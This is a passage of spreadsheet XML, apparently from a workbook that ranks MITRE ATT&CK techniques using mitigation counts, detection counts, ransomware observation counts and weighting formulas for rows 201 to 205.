        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X201">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y201">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z201">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA201">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB201">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC201" s="29" t="s">
        <v>368</v>
      </c>
      <c r="AD201" s="25" t="str" cm="1">
        <f t="array" ref="AD201">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC201)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE201" s="25">
        <f>IF(AD201="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF201" s="25" t="str" cm="1">
        <f t="array" ref="AF201">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC201)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG201" s="25">
        <f>IF(AF201="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH201" s="25" t="str" cm="1">
        <f t="array" ref="AH201">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC201)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI201" s="25">
        <f>IF(AH201="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ201" s="25" t="str" cm="1">
        <f t="array" ref="AJ201">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC201)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK201" s="25">
        <f>IF(AJ201="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL201" s="25" t="str" cm="1">
        <f t="array" ref="AL201">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC201)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM201" s="25">
        <f>IF(AL201="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN201" s="60">
        <v>0</v>
      </c>
      <c r="AO201" s="51">
        <v>0</v>
      </c>
      <c r="AP201" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="AQ201" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AR201" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AS201" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT201" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU20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02" spans="1:47" ht="32.1">
      <c r="A202" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="B202" s="25">
        <f>SUM(H202,M202,V202)*(1+SUM(AE202,AG202,AI202,AK202,AM202))</f>
        <v>0.44966666666666671</v>
      </c>
      <c r="C202" s="25" t="s">
        <v>888</v>
      </c>
      <c r="D202" s="25" t="s">
        <v>863</v>
      </c>
      <c r="E202" s="25" t="s">
        <v>889</v>
      </c>
      <c r="F202" s="51">
        <v>1</v>
      </c>
      <c r="G202" s="51">
        <v>1</v>
      </c>
      <c r="H202" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I202">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J202">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K202">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L202">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M202" s="25">
        <v>0</v>
      </c>
      <c r="N202" s="51">
        <v>1</v>
      </c>
      <c r="O202" s="51">
        <v>5</v>
      </c>
      <c r="P202" s="51">
        <v>0</v>
      </c>
      <c r="Q202" s="51">
        <v>2</v>
      </c>
      <c r="R202" s="52" t="s">
        <v>890</v>
      </c>
      <c r="S202" s="51">
        <v>13</v>
      </c>
      <c r="T202" s="52" t="s">
        <v>891</v>
      </c>
      <c r="U202" s="51">
        <v>8</v>
      </c>
      <c r="V202" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.23809523809523811</v>
      </c>
      <c r="W202">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X202">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y202">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z202">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>8</v>
      </c>
      <c r="AA202">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.08</v>
      </c>
      <c r="AB202">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.08</v>
      </c>
      <c r="AC202" s="29" t="s">
        <v>892</v>
      </c>
      <c r="AD202" s="25" t="str" cm="1">
        <f t="array" ref="AD202">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC202)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE202" s="25">
        <f>IF(AD202="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF202" s="25" t="str" cm="1">
        <f t="array" ref="AF202">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC202)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG202" s="25">
        <f>IF(AF202="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH202" s="25" t="str" cm="1">
        <f t="array" ref="AH202">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC202)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI202" s="25">
        <f>IF(AH202="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ202" s="25" t="str" cm="1">
        <f t="array" ref="AJ202">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC202)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK202" s="25">
        <f>IF(AJ202="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL202" s="25" t="str" cm="1">
        <f t="array" ref="AL202">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC202)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM202" s="25">
        <f>IF(AL202="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN202" s="52">
        <v>0</v>
      </c>
      <c r="AO202" s="51">
        <v>0</v>
      </c>
      <c r="AP202" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="AQ202" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AR202" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AS202" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT202" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU20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03" spans="1:47" ht="32.1">
      <c r="A203" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.12774714285714286</v>
      </c>
      <c r="B203" s="25">
        <f>SUM(H203,M203,V203)*(1+SUM(AE203,AG203,AI203,AK203,AM203))</f>
        <v>0.94413809523809533</v>
      </c>
      <c r="C203" s="25" t="s">
        <v>893</v>
      </c>
      <c r="D203" s="25" t="s">
        <v>894</v>
      </c>
      <c r="E203" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F203" s="51">
        <v>2</v>
      </c>
      <c r="G203" s="51">
        <v>9</v>
      </c>
      <c r="H203" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.55000000000000004</v>
      </c>
      <c r="I203">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J203">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K203">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.9</v>
      </c>
      <c r="L203">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.9</v>
      </c>
      <c r="M203" s="25">
        <v>0</v>
      </c>
      <c r="N203" s="51">
        <v>0</v>
      </c>
      <c r="O203" s="51">
        <v>0</v>
      </c>
      <c r="P203" s="51">
        <v>0</v>
      </c>
      <c r="Q203" s="51">
        <v>4</v>
      </c>
      <c r="R203" s="52" t="s">
        <v>895</v>
      </c>
      <c r="S203" s="51">
        <v>10</v>
      </c>
      <c r="T203" s="52" t="s">
        <v>896</v>
      </c>
      <c r="U203" s="51">
        <v>13</v>
      </c>
      <c r="V203" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="W203">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>23</v>
      </c>
      <c r="X203">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Y203">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Z203">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA203">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB203">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC203" s="29" t="s">
        <v>206</v>
      </c>
      <c r="AD203" s="25" t="str" cm="1">
        <f t="array" ref="AD203">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC203)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE203" s="25">
        <f>IF(AD203="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF203" s="25" t="str" cm="1">
        <f t="array" ref="AF203">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC203)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG203" s="25">
        <f>IF(AF203="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH203" s="25" t="str" cm="1">
        <f t="array" ref="AH203">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC203)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI203" s="25">
        <f>IF(AH203="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ203" s="25" t="str" cm="1">
        <f t="array" ref="AJ203">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC203)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK203" s="25">
        <f>IF(AJ203="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL203" s="25" t="str" cm="1">
        <f t="array" ref="AL203">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC203)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM203" s="25">
        <f>IF(AL203="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN203" s="52">
        <v>1</v>
      </c>
      <c r="AO203" s="51">
        <v>1</v>
      </c>
      <c r="AP203" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.12774714285714286</v>
      </c>
      <c r="AQ203" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.31471269841269844</v>
      </c>
      <c r="AR203" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.31471269841269844</v>
      </c>
      <c r="AS203" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT203" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU20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04" spans="1:47" ht="63.95">
      <c r="A204" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="B204" s="25">
        <f>SUM(H204,M204,V204)*(1+SUM(AE204,AG204,AI204,AK204,AM204))</f>
        <v>0.44966666666666671</v>
      </c>
      <c r="C204" s="25" t="s">
        <v>897</v>
      </c>
      <c r="D204" s="25" t="s">
        <v>486</v>
      </c>
      <c r="E204" s="25" t="s">
        <v>898</v>
      </c>
      <c r="F204" s="51">
        <v>1</v>
      </c>
      <c r="G204" s="51">
        <v>1</v>
      </c>
      <c r="H204" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I204">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J204">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K204">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L204">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M204" s="25">
        <v>0</v>
      </c>
      <c r="N204" s="51">
        <v>1</v>
      </c>
      <c r="O204" s="51">
        <v>10</v>
      </c>
      <c r="P204" s="51">
        <v>0</v>
      </c>
      <c r="Q204" s="51">
        <v>3</v>
      </c>
      <c r="R204" s="52" t="s">
        <v>899</v>
      </c>
      <c r="S204" s="51">
        <v>7</v>
      </c>
      <c r="T204" s="51" t="s">
        <v>900</v>
      </c>
      <c r="U204" s="51">
        <v>11</v>
      </c>
      <c r="V204" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="W204">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>18</v>
      </c>
      <c r="X204">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Y204">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Z204">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>14</v>
      </c>
      <c r="AA204">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.14000000000000001</v>
      </c>
      <c r="AB204">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.14000000000000001</v>
      </c>
      <c r="AC204" s="29" t="s">
        <v>901</v>
      </c>
      <c r="AD204" s="25" t="str" cm="1">
        <f t="array" ref="AD204">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC204)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE204" s="25">
        <f>IF(AD204="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF204" s="25" t="str" cm="1">
        <f t="array" ref="AF204">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC204)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG204" s="25">
        <f>IF(AF204="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH204" s="25" t="str" cm="1">
        <f t="array" ref="AH204">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC204)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI204" s="25">
        <f>IF(AH204="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ204" s="25" t="str" cm="1">
        <f t="array" ref="AJ204">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC204)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK204" s="25">
        <f>IF(AJ204="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL204" s="25" t="str" cm="1">
        <f t="array" ref="AL204">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC204)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM204" s="25">
        <f>IF(AL204="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN204" s="52">
        <v>0</v>
      </c>
      <c r="AO204" s="51">
        <v>0</v>
      </c>
      <c r="AP204" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="AQ204" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AR204" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AS204" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT204" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU20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05" spans="1:47" ht="48">
      <c r="A205" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4333333333333343E-2</v>
      </c>
      <c r="B205" s="25">
        <f>SUM(H205,M205,V205)*(1+SUM(AE205,AG205,AI205,AK205,AM205))</f>
        <v>0.44333333333333341</v>
      </c>
      <c r="C205" s="25" t="s">
        <v>902</v>
      </c>
      <c r="D205" s="25" t="s">
        <v>109</v>
      </c>
      <c r="E205" s="25" t="s">
        <v>903</v>
      </c>
      <c r="F205" s="51">
        <v>1</v>
      </c>
      <c r="G205" s="51">
        <v>1</v>
      </c>
      <c r="H205" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I205">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J205">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K205">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L205">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M205" s="25">
        <v>0</v>
      </c>
      <c r="N205" s="51">
        <v>0</v>
      </c>
      <c r="O205" s="51">
        <v>1</v>
      </c>
      <c r="P205" s="51">
        <v>0</v>
      </c>
      <c r="Q205" s="51">
        <v>0</v>
      </c>
      <c r="R205" s="52" t="s">
        <v>904</v>
      </c>
      <c r="S205" s="51">
        <v>15</v>
      </c>
      <c r="T205" s="51" t="s">
        <v>860</v>
      </c>
      <c r="U205" s="51">
        <v>9</v>
      </c>
      <c r="V205" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.23333333333333334</v>
      </c>
      <c r="W205">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>24</v>
      </c>
      <c r="X205">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.43636363636363634</v>
      </c>
      <c r="Y205">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.43636363636363634</v>
      </c>
      <c r="Z205">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA205">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB205">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC205" s="29" t="s">
        <v>112</v>
      </c>
      <c r="AD205" s="25" t="str" cm="1">
        <f t="array" ref="AD205">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC205)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE205" s="25">
        <f>IF(AD205="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF205" s="25" t="str" cm="1">
        <f t="array" ref="AF205">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC205)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG205" s="25">
        <f>IF(AF205="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH205" s="25" t="str" cm="1">
